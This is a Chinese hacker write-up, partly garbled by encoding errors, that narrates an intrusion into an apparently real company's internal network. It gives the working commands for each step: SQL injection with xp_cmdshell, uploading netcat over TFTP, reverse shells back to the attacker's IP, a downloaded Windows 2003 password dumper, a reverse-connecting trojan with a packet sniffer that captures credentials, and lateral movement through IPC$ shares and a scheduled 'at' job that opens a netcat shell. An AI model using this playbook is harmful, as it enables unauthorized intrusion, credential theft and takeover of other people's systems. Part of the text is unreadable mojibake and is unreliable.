04年不平凡的一年,各種漏洞相繼發(fā)現(xiàn),各種
入侵技巧也應運而生,原本固若金湯的機器,在新的漏洞面前,也變的弱不禁風。牛人發(fā)現(xiàn)并編寫的Serv-u的
溢出程序,為提升系統(tǒng)權限大開方便之門,NBSI把SQL
注入發(fā)揮的淋漓盡致,PHP
注入也日趨成熟,哪位怪才發(fā)現(xiàn)的上傳漏洞在很多
腳本中也都花樣倍出,像DV,DZ等等大名鼎鼎的
論壇也是漏洞疊報,數(shù)家著名公司被敲詐,黑客組織也是明爭暗斗,虛擬主機也飽受旁注困擾。攻與防就像矛與盾,從某種意義上來說,攻就是防,防就是攻!
“千里之堤,潰于蟻穴”,一個小小的漏洞就可以攻克一臺機器,甚至占領整個內(nèi)部網(wǎng)絡。本文以一臺機器為突破口,然后如何利用內(nèi)網(wǎng)其它機器做跳板,最后控制目標機器(如果說利用一臺機器上的某個站點來控破淥鏡憬兄苯優(yōu)宰⒌幕?,偶想把利用同一网闹k釗醯囊惶ɑ鰨創(chuàng)锏嬌刂譜釙康幕鶻形式優(yōu)宰?,比渗透入侵偶觉着哄i?,其蕮v椒ê芏嗯H嗽纈美昧?,徘v謖飫鏘殖罅耍?/DIV>
一、通過SQL
注入漏洞,反向連接數(shù)據(jù)庫機器。
利用NBSI掃描發(fā)現(xiàn)存在SQL
注入漏洞,而且還是SA權限,如圖1

圖1
利用NBSI的DOS執(zhí)行命令,輸入ipconfig –all 發(fā)現(xiàn)網(wǎng)址與WEB服務器不同,但是從網(wǎng)關上來看是在同一網(wǎng)段內(nèi)。執(zhí)行netstat –an查看數(shù)據(jù)庫服務器所開的端口,發(fā)現(xiàn)很多1433端口都是WEB服務器連接,21,23,80端口沒!利用NBSI的瀏覽目錄功能,沒發(fā)現(xiàn)機器上存在PCANYWHERE和SERV-U(利用它們可以遠程控制,提升權限,或猜測口令)。利用net start 命令沒發(fā)現(xiàn)如瑞星,KV等殺毒軟件或_blank">防火墻服務,然后利用HSCAN1。2和NMAP3。7掃描數(shù)據(jù)庫服務器的外網(wǎng)IP進,竟然沒掃到一個開放的端口?。ü烙嫏C器上裝了硬件_blank">防火墻?。Ω禵blank">防火墻,偶想到了反向鏈接,在本地開了一個TFTP,利用命令, tftp –I ip get nc.exe 很幸運的上傳了一個NC上去,利用同樣的方法也上傳了一個MT。EXE(MT.EXE是一個網(wǎng)絡管理方面的軟件,依照yy3的說法,也就是 "七拼八湊來的,純粹是圖個方便。"可是這個方便個真的是太方便了,僅40K的一個程序,但是集合了近四十種的命令于一身)上去。也可以利用FTP命令,把FTP命令用ECHO命令寫進一個文件里面,最后在用FTP –S:FILENAME來實現(xiàn)文件的下載。在本機利用NC監(jiān)聽66端口,命令如下:NC –L –P 66 ,遠程機器上執(zhí)行:NC –E CMD。EXE IP 66不一會兒,一個SHELL就出來了(還是在這里面運行命令爽啊,在NBSI里憋死了,有時在NBSI里執(zhí)行命令時會出現(xiàn)“意外數(shù)據(jù)”,還要被破在游覽器里執(zhí)行_cmdshell%20'dos">http://www.***.com.tw/***/***.asp? mode=1&ID=256;exec%20master..xp_cmdshell%20'dos command';--)利用net view 命令查看共有三臺機器!如圖2

圖2
[NextPage]
在利用命令:NET VIEW \\機器名 時得到的內(nèi)容為空,看來是沒共享目錄??!
二、上傳反彈、監(jiān)聽
木馬顯奇功。
利用MT。EXE –SYSINFO命令顯示出數(shù)據(jù)庫服務的系統(tǒng)信息,網(wǎng)卡信息,配置信息,和所安裝的軟件信息。如圖3(只截了系統(tǒng)信息)
圖3
是WIN2003怪不得用MT –FINDPASS命令沒顯出密碼來,它只顯示的2K的密碼。利用命令mt –netget http://www.***.com/findpass2003.exe(mt -netget <url> <filename to saved> ---Download from http/ftp.)下載到本地一個看WIN2003密碼的軟件??!運行findpass2003.exe后沒有在內(nèi)存中找到密碼?。磥淼南朕k法讓管理員登錄了!哈哈)
運行命令: mt –netget http://www.***.com/hacan120.rar hscan.rar 下載一個HSCAN1。2進去,利用同樣的方法又下載進去一個UNRAR。EXE然后執(zhí)行命令:unrar.exe x hscan.rar 這樣就把HSCAN。RAR解壓到HSCAN目錄當中了!可以利用HACSN1。2版本的DOS命令進行內(nèi)網(wǎng)掃描,命令如下:hscan -h www.target.com -all –ping掃完其余兩臺以后沒發(fā)現(xiàn)任何弱口令,但發(fā)現(xiàn)它們在內(nèi)網(wǎng)中開了很多端口,如:21,80,135,139,3389 等
注意:HSCAN掃描完了以后,會生成報告,自動用瀏覽器打開,應該利用MT –PSLIST 和MT –PSKILL把這個瀏覽器關掉!
即然開了3389能不能利用端口重定向,把它定向到數(shù)據(jù)庫這臺機器上呢,經(jīng)過實踐利用mt -redirect <TargetIP> <TargetPort> <ListenPort> ----TCP port redirector. 和利用FPIPE都沒有成功(定向后,用NETSTAT –AN命令看是端向成功,但是在外網(wǎng)還是沒法訪問)哪數(shù)據(jù)庫這臺機器能不能利用帶反彈型的圖形
木馬來控制屏幕呢?實踐證明利用神氣兒,灰
鴿子,溯雪都失敗了!看來只能裝DOS版的后門了,哪試試APR欺騙如何?因在DOS下沒法安裝圖形界面的WINPCAP,所以ARPSINFFER。EXE無法運行?。ê髞碜约鹤隽艘粋€DOS版的)
這臺機器上除了操作系統(tǒng),數(shù)據(jù)庫,WIN2003補丁外什么都沒裝,難道真的就沒有辦法了嗎?這時偶想到了一個
木馬,一個女黑客編寫的,即有反向連接功能,又有監(jiān)聽功能,是什么呢?聰明的朋友,你猜到了嗎?她就是大名鼎鼎,如雷貫耳,威名遠波,無所不知的WOLLF(偶好喜歡她啊! 哈哈)運行WOLLF –SETUP后做一個反向鏈接的
木馬,偶選擇的是反向鏈接所取的IP放在一個HTTP
空間的文件中!制作好后,同樣利用MT。EXE –NETGET命令下載到數(shù)據(jù)庫服務器當中,運行后,它會自動向你的HTTP
空間中存放的文件中去取反向鏈接的IP和端口,這時你可以在本機上用NC –L –P PORT 慢慢等待,一會以后,反向連接成功了,輸密碼進入吧!如圖4
圖4
[NextPage]
進入后,執(zhí)行命令:SNIFF <Log_file> (她可以監(jiān)聽 ftp/smtp/pop3/http四種密碼經(jīng)過網(wǎng)卡的 )findpass2003.exe不是還沒找到密碼嗎?這時候,利用MT.EXE –PSKILL命令把它的數(shù)據(jù)庫停掉,偶就不信管理員不來!在WOLLF環(huán)境下執(zhí)行EXIT退出(但是監(jiān)聽程序還是在運行的,如果執(zhí)行QUIT后,就不監(jiān)聽了),累死偶了,睡覺去了!
一覺醒來,太陽都老高了,睡懶覺可真舒服啊!在倒連上去看看有沒有抓到有價值的信息,先輸入命令:SNIFF_STOP把監(jiān)聽停下,在利用WOLLF帶的GET命令把監(jiān)聽的文件下載下來,哈,收獲可真不小如圖5所示:

圖5
圖5所示監(jiān)聽到固若金湯的WEB服務器的一個80端口的用戶名和密碼,登錄上一看,原理是一個
會員的!還監(jiān)聽到一臺機器的21端口的用戶名和密碼了和這臺機器的25端口的一個MAIL,查看其IP后發(fā)現(xiàn)它就是上面利用NET VIEW看到的三臺機器中的一臺,就叫它“
郵件WEB服務器”吧,在外網(wǎng)掃描還發(fā)現(xiàn)它開了80端口!看來這臺機器有兩個作用:一是作為
郵件服務器,另一個作用就是開了80端口,上面放了部網(wǎng)站內(nèi)容,而主要網(wǎng)站的內(nèi)容則在哪臺固若金湯的WEB服務器上(在外網(wǎng)掃描它進,只開了80端口,真夠狠!哪臺
郵件WEB服務器對外網(wǎng)也僅開了21,25,80,110四個端口)先別忙登錄??!可不要忘了哪個findpass2003命令??!如圖6:

圖6
利用net user username看了一下這個用戶是管理員啊!密碼設置的很變態(tài)字母數(shù)字特殊字符都有,管理員一般都有一個習慣,所有機器上的管理員的密碼都相同,后來驗證,果然如此!
得到用戶名和密碼后,試圖在數(shù)據(jù)庫服務器上對另外兩臺機器執(zhí)行命令:net use \\IP\admin$ passwd /user:username 均沒有成功!
FTP登錄
郵件WEB服務器,還是Serv-U FTP-Server v2.5k,會不會能
溢出呢?登錄成功后,上傳一個海頂2005和NC。EXE上去,再次反向鏈接如圖:7

圖7
[NextPage]
利用IPC漏洞(在這臺機器上對WEB服務器竟然能成功!哈哈)
1.net use \\WEB服務器\admin$ password /user: username
其中username,password為連接遠程主機時提供的用戶名與密碼
2.copy x:\nc.exe \\WEB服務器\admin$
拷貝NC到WEB服務器上
3.net time \\遠程主機名
顯示W(wǎng)EB服務器當前的時間假如為09:12
3.at \\WEB服務器 09:14 nc.exe –e cmd.exe 218.***.***.165 99
在09:14分WEB服務器自動NC反向鏈接偶的機器的99端口。如圖8

圖8
2分鐘過去,終于成功了,終于進入到哪臺固若金湯的WEB服務器里面了!成功后界面如圖9:
圖9
其中在反彈的SHELL中利用XYZCMD。EXE這個工具進行在次登錄時,沒有成功,也就是SHELL中在出SHELL時沒有成功,看來是不支持數(shù)據(jù)的二交互。圖中同現(xiàn)的網(wǎng)址已做處理,如有雷同,純屬巧合。希望本方法對大家有所幫助,不管是攻還是防!